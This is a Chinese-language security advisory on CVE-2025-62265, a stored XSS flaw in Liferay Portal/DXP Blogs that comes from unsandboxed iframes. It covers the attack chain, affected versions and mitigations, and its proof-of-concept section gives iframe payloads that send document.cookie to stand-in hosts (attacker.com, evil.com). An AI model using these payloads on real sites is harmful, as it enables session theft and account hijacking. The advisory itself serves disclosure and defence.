CVE-2025-62265 Liferay Portal/DXP Blogs组件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62265

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Liferay Portal, Liferay DXP

漏洞概述

CVE-2025-62265是Liferay Portal和DXP产品中Blogs组件的一个高危存储型跨站脚本（XSS）漏洞。该漏洞存在于Blogs widget的"Content"文本字段中，攻击者可以通过在博客内容中注入特制的<iframe>标签来执行任意JavaScript代码。由于Liferay未对<iframe>元素添加sandbox属性，嵌入的iframe可以访问父页面的DOM结构和脚本上下文。成功利用此漏洞的攻击者可以窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。该漏洞影响多个Liferay Portal 7.4.x版本和Liferay DXP的多个季度版本，需要低权限用户交互才能触发，CVSS评分5.4，属于中危漏洞。

技术细节

该漏洞的根本原因在于Liferay的Blogs组件在渲染用户提交的博客内容时，未对<iframe>标签实施适当的安全控制。具体来说，当用户在博客条目的"Content"字段中插入<iframe>标签时，系统不会自动添加sandbox属性。缺少sandbox属性意味着iframe内的内容可以执行脚本、访问父窗口的JavaScript上下文、操作DOM、以及发送/接收Cookie。这允许攻击者创建一个包含恶意JavaScript的iframe，当其他用户查看该博客文章时，恶意代码就会在受害者浏览器中执行。攻击者可以利用此漏洞实施多种攻击场景，包括但不限于：会话劫持（通过document.cookie获取会话信息）、DOM篡改（修改页面内容进行钓鱼）、键盘记录（捕获用户输入的敏感信息）以及重定向用户到恶意网站。由于这是存储型XSS，恶意载荷会持久化在服务器端，所有访问该博客内容的用户都会受到攻击。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标系统使用的Liferay版本，确认其属于受影响版本范围（7.4.0-7.4.3.111或DXP受影响的季度版本）

STEP 2

Initial Access

攻击者以低权限用户身份登录Lifter Portal/DXP，创建或编辑博客条目

STEP 3

Payload Injection

在博客的Content文本字段中注入恶意<iframe>标签，该标签包含用于窃取数据的JavaScript代码

STEP 4

Persistence

由于是存储型XSS，恶意载荷被持久化保存到数据库中，无需再次注入

STEP 5

Execution

当其他用户（受害者）访问该博客文章时，恶意iframe在受害者浏览器中加载执行

STEP 6

Impact

由于缺少sandbox属性，iframe内的脚本可以访问父页面上下文，窃取Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-62265 PoC: Stored XSS via iframe without sandbox attribute -->
<!-- This PoC demonstrates how to inject malicious iframe into Liferay Blogs Content field -->

<!-- Step 1: Create a blog entry with malicious iframe in Content field -->
<!-- Insert the following payload in the Blog's Content text field: -->

<iframe src="javascript:alert(document.cookie)" width="0" height="0" style="display:none"></iframe>

<!-- Or more sophisticated payload -->
<iframe src="data:text/html,<script>fetch('https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie))</script>" sandbox="allow-scripts allow-same-origin"></iframe>

<!-- Step 2: When victim views the blog, the script executes -->
<!-- The iframe can access parent page context due to missing sandbox attribute -->

<!-- Example: Stealing session tokens -->
<iframe src="javascript:(function(){var x=document.createElement('img');x.src='https://evil.com/log?c='+encodeURIComponent(document.cookie);document.body.appendChild(x)})()" style="visibility:hidden"></iframe>

影响范围

Liferay Portal 7.4.0 through 7.4.3.111

Liferay Portal older unsupported versions

Liferay DXP 2023.Q4.0 through 2023.Q4.10

Liferay DXP 2023.Q3.1 through 2023.Q3.8

Liferay DXP 7.4 GA through update 92

Liferay DXP 7.3 GA through update 36

Liferay DXP older unsupported versions

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)层面添加规则，过滤博客Content字段中的<iframe>标签；2) 禁用博客评论功能和富文本编辑器的高级特性；3) 对所有博客内容实施HTML白名单过滤，仅允许安全的HTML标签；4) 限制低权限用户创建博客内容的权限；5) 监控异常的内容提交行为；6) 考虑临时禁用Blogs widget直到应用安全补丁。